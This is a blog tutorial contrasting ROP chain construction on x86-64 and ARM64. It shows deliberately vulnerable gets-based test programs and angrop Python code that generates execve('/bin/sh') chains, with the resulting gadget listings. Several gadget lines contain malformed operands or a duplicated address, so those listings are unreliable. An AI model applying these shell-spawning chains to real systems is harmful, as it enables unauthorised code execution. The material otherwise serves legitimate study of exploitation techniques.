x86-64 vs ARM64 ROP

Introduction

Return-oriented programming (ROP) is fairly trivial for architectures like x86-64 with stack-based returns which transfer control to a return address located on the stack. However, on ARM64, software can't write directly to the program counter. It can only be updated through branches and exception entries or returns. This makes stack-based returns in the x86-64 sense impossible.

Naturally, this key architectural difference means that the structure of ROP chains differs between x86-64 and ARM64. It also affects the practicality of manually crafting such chains. Instead, it naturally lends itself to using ROP chain generators.

ROP Chain Structure

On x86-64, typical ROP gadgets end with a ret instruction which pops the value from the top of the stack specified by rsp into the program counter rip. This makes gadget chaining easy since the stack pointer, which functions as a quasi program counter, is automatically advanced to the next gadget on the stack.

Below is a hypothetical stack view of an x86-64 ROP chain that writes 0xdeadbeef to rdi and 0xfeedface to rsi:

0x0000000000000000: pop, %rdi; ret
0x0000000000000008: 0xdeadbeef
0x0000000000000010: pop, %rsi; ret
0x0000000000000018: 0xfeedface
Here's how the ROP chain executes:
  1. The stack pointer begins at 0x8.
  2. pop, %rdi pops 0xdeadbeef into rdi. Now the stack pointer is at 0x10.
  3. ret transfers control to the address at 0x10. Now the stack pointer is at 0x18.
  4. pop, %rsi pops 0xfeedface into rsi. Now the stack pointer is at 0x20.
  5. ret transfers control to the address at 0x20. Now the stack pointer is at 0x28

On architectures with stack-based returns, ROP chains automatically chain themselves together since the return instruction transfers control to the next gadget on the stack. You just place all your gadgets on the stack, padding where necessary and they execute in that order.

ARM64 has a ret instruction too. However, instead of writing directly to the program counter pc, it branches to the link register lr. Simple gadgets still end with a ret instruction, however, you have to advance to the next gadget manually by setting lr in the gadget. Since ret is really just a branch, you can substitute it with any branch instruction as long as you control the destination.

Below is a hypothetical stack view of an ARM64 ROP chain that writes 0xdeadbeef to x0 and 0xfeedface to x1:

0x0000000000000000: ldr x0, [sp]; ldr lr, [sp, #0x8], #0x10; ret
0x0000000000000008: 0xdeadbeef
0x0000000000000010: ldr x1, [sp]; ldr lr, [sp, #0x8], #0x10; ret
0x0000000000000018: 0xfeedface

Here's how the ROP chain executes:

  1. The stack pointer begins at 0x8.
  2. ldr x0, [sp] loads 0xdeadbeef into x0.
  3. ldr lr, [sp, #0x8], #0x10 loads the value at 0x10 into lr and adds 0x10 to the stack pointer. Now the stack pointer is at 0x18.
  4. ret transfers control to the address in lr.
  5. ldr x1, [sp] loads 0xfeedface into x1.
  6. ldr lr, [sp, #0x8], #0x10 loads the value at 0x20 into lr and adds 0x10 to the stack pointer. Now the stack pointer is at 0x28.
  7. ret transfers control to the address in lr.

Notice how the gadgets have to manually chain themselves together. They have to get the address of the next gadget into lr before ret is executed.

Unfortunately you'll never find gadgets like these in the wild: gadgets which perfectly advance the stack pointer up the stack. The offsets you see here for loads and stores were chosen for simplicity. Usually, you'll find that the stack offsets in loads and stores can be rather large resulting in a larger chain size due to padding.

ROP Chain Generation

Normally, I write ROP chains manually. This requires me running ROPgadget on relevant binaries and then combing through their gadgets to build up a chain. This works fine for architectures where you're likely to find simple gadgets with no side effects or dependencies. However, these sort of gadgets rarely exist in ARM64 binaries.

Take the glibc on my system for example, a supposed trove of gadgets. On x86-64, say you wanted to set rdi to a value. That's no problem, pop rdi; ret exists. Want to set rsi too? pop rsi; ret exists. On ARM64, say you want to set x0 to a value. Well you have ldr x0, [sp, #0x10]; ldp fp, lr, [sp], #0x20; ret. But then say you want to set x1 too. Now the gadgets become more constrained. ldr x1, [sp, #0x20]; add sp, sp, #0xb0; br x16 was literally the nicest gadget I could find. However, it requires you to control x16 to continue your chain. So that's yet another gadget you'll have to find. And what if that gadget requires you to control a different register? The dependencies just keep on growing.

I wondered if there was a better way to write ROP chains, something more automated. Like was there an angr but for ROP? A tool where I could say "here are a a set of gadgets, now find the sequence of gadgets which result in this state". Well it turns out that that exact tool exists: angrop.

angrop's made by the same great people who made angr. It's built on top of angr's symbolic execution engine, and uses constraint solving for generating ROP chains. Most importantly, it understands the effects of gadgets.

I wrote a test programs for x86-64 and ARM64 to test angrop's ROP chain generation. Each test program was statically linked with glibc and had a vulnerable function vuln which called gets with the current stack frame's base as its argument. I wanted to see if I could generate a ROP chain which would write "/bin/sh" to writable memory, and make an execve system call to it. It's important to note that while the test programs are statically linked with glibc, they don't include all of glibc's gadgets. Nevertheless, there'll still be more than enough to play with.

Here's the architecture-independent program:

extern void vuln();

int main() {
  vuln();
}

Here's the x86-64 vulnerable function:

.global vuln
.type vuln, @function
vuln:
  push %rbp
  mov %rsp, %rbp
  mov %rbp, %rdi
  call gets
  pop %rbp
  ret
.size vuln, .-vuln

And here's the ARM64 vulnerable function:

.global vuln
.type vuln, @function
vuln:
  stp fp, lr, [sp, #-16]!
  mov x0, sp
  bl gets
  ldp fp, lr, [sp], #16 
  ret
.size vuln, .-vuln

Each program using angrop typically begins with the following:

import angr, angrop

p = angr.Project("pathname")
rop = p.analyses.ROP()

Similar to using angr, the first step is to load a binary into a project. Then, to use angrop, you need to instantiate an angrop.ROP object for gadget finding.

Currently angrop is aware of no gadgets. You can either search for them in the binary or import them. You'll need to search for them in the binary at least once. However, since searching takes a bit of time and there's no gadget cache, you'll also want to save the gadgets:

rop.find_gadgets()
rop.save_gadgets("gadgets")

Now on subsequent runs, you can replace the above lines with:

rop.load_gadgets("gadgets")

With these gadgets you can construct a ROP chain using angr's symbolic execution engine. angrop provides helper functions which among other things can set registers, call functions, and write to memory.

Here's how you'd create the x86-64 ROP chain:

obj = p.loader.main_object
segment = next(s for s in obj.segments if s.is_writable)
syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "syscall ; ret ")

chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00")
chain += rop.set_regs(rax=59, rdi=segment.vaddr, rsi=0, rdx=0)
chain.add_gadget(syscall_gadget)

And here's how you'd create the ARM64 ROP chain:

obj = p.loader.main_object
segment = next(s for s in obj.segments if s.is_writable)
syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "svc #0; ret ")

chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00")
chain += rop.set_regs(x8=221, x0=segment.vaddr, x1=0, x2=0)
chain.add_gadget(syscall_gadget)

The above ROP chain generation code will only work if there are sufficient gadgets to satisfy the ROP chain's constraints. This is purely dependent on the gadget the ROP gadget finder finds. The gadget finder class angrop.ROP accepts several arguments in its constructor to configure the search criteria. I found that the defaults worked perfectly for x86-64. However, that wasn't the case with ARM64.

I had to change the instantiation to:

rop = p.analyses.ROP(fast_mode=False, max_block_size=64)

The issue was caused by the default value of the max_block_size argument which controls the maximum gadget length in bytes. For x86-64 the default size is 12. This is fine since x86-64 gadgets aren't typically long and x86-64 has variable length instructions. For ARM64, the default size is 40. With a fixed instruction length of 4 bytes, this means a gadget can contain at must 10 instructions. This may seem like enough, but as you've seen, ARM64 gadgets aren't pretty: they can be long. And in glibc, long they are.

I noticed that the gadget finder wasn't able to set x0 even though such a gadget existed. However, said gadget was over 10 instructions long! I found that setting the value to 64 to allow up to 16 instructions was a more reasonable value that found better, yet more complicated gadgets. I also found that I had to set fast_mode to false to prevent max_block_size from being overridden. The only trade-off of a larger maximum block size was search speed but that's fine since you only have to search once.

In the end, for both architectures, angrop was able to successfully generate a ROP chains to pop a shell.

Here's the generated x86-64 ROP chain:

0x0000000000000000: pop %rdi; ret
0x0000000000000008: 0x497f68
0x0000000000000010: pop %rsi; add $0x9340, %eax; ret
0x0000000000000018: 0x68732f6e69622f
0x0000000000000020: mov %rsi, 0x98(%rdi), rsi; ret
0x0000000000000028: pop %rdi; ret
0x0000000000000030: 0x498000
0x0000000000000038: pop %rsi; ret
0x0000000000000040: 0x0
0x0000000000000048: pop %rax; pop %rdx; pop %rbx; ret
0x0000000000000050: 0x3b
0x0000000000000058: 0x0
0x0000000000000060: 0x0
0x0000000000000060: syscall; ret

And here's the ARM64 ROP chain:

0x0000000000000000: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; add x0, x0, x2; ret
0x0000000000000008: 0x0
0x0000000000000010: ldr x3, [sp, #0x10]; mov x0, x3; ldp fp, lr, [sp], #0x40; ret
0x0000000000000018: 0x0
0x0000000000000020: 0x48ffd0
0x0000000000000028: 0x0
0x0000000000000030: str x0, [x2, #0lr]; mov w0, #0; ldp fp, lr, [sp], #0x20; ret
0x0000000000000038: 0x68732f6e69622f
0x0000000000000040: 0x0
0x0000000000000048: 0x0
0x0000000000000050: 0x0
0x0000000000000058: 0x0
0x0000000000000060: 0x0
0x0000000000000068: 0x0
0x0000000000000070: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; mov x0, x2; ret
0x0000000000000078: 0x0
0x0000000000000080: 0x0
0x0000000000000088: 0x0
0x0000000000000090: mov x16, x0; ldp q0, q1, [sp, #0x50]; ldp q2, q3, [sp, #0x70]; ldp q4, q5, [sp, #0x90]; ldp q6, q7, [sp, #0xb0]; ldp x0, x1, [sp, #0x40]; ldp x2, x3, [sp, #0lr]; ldp x4, x5, [sp, #0x20]; ldp x6, x7, [sp, #0x10]; ldp x8, x9, [sp], #0xd0; ldp x17, lr, [sp], #0x10; br x16
0x0000000000000098: 0x0
0x00000000000000a0: svc #0; ret
0x00000000000000a8: 0xdd
0x00000000000000b0: 0x0
0x00000000000000b8: 0x0
0x00000000000000c0: 0x0
0x00000000000000c8: 0x0
0x00000000000000d0: 0x0
0x00000000000000d8: 0x0
0x00000000000000e0: 0x0
0x00000000000000e8: 0x490000
0x00000000000000f0: 0x0
0x00000000000000f8: 0x0
0x0000000000000100: 0x0
0x0000000000000108: 0x0
0x0000000000000110: 0x0
0x0000000000000118: 0x0
0x0000000000000120: 0x0
0x0000000000000128: 0x0
0x0000000000000130: 0x0
0x0000000000000138: 0x0
0x0000000000000140: 0x0
0x0000000000000148: 0x0
0x0000000000000150: 0x0
0x0000000000000158: 0x0
0x0000000000000160: 0x0
0x0000000000000168: 0x0
0x0000000000000170: 0x0
0x0000000000000178: 0x0
0x0000000000000180: 0x0

Both are impressive, but I was far more impressed by the ARM64 chain. It's faster to just throw it at the binary than attempting to statically analyze it. I mean, just look at the mammoth gadget at 0x90! It's like looking at the output of a compiler. Some things just aren't immediately clear at all. But the compiler, or in this case angrop, can see right through it.

Conclusion

I've come to the conclusion that practical ROP is just harder on ARM64 than on x86-64. Now I'm no ROP historian, but maybe the technique was first discovered on an architecture with stack-based returns. I don't know, a part of me just feels like it was made for the x86 architecture family.

So, if you're ever knee-deep in crafting an x86-64 ROP chain and things are getting a bit hairy, just remember that it could be worse. Instead, you could be knee-deep crafting an ARM64 ROP chain without angrop.